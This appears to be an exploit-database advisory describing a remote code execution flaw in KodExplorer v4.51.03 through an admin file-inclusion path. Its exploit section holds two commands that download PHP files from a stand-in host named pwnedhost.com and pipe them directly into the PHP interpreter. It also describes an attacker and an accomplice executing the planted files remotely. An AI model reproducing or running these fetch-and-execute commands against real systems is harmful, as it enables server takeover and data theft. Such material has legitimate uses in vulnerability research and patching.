## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload

## Description:
By using this vulnerability remotely, the malicious pwned_admin can
list and manipulate all files inside the server. This is an absolutely
DANGEROUS and STUPID decision from the application owner! In this
scenario, the attacker prepares the machine for exploitation and sends
a link for remote execution by using the CURL protocol to his
supporter - another attacker. Then and he waits for execution from his
colleague, to mask his action or even more worst than ever. What a
nice hack is this! :)

STATUS: CRITICAL Vulnerability

[+]Exploit:
```CURL
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
| php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
| php

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)

## Proof and Exploit:
[href](https://streamable.com/98npd0)

## Time spend:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>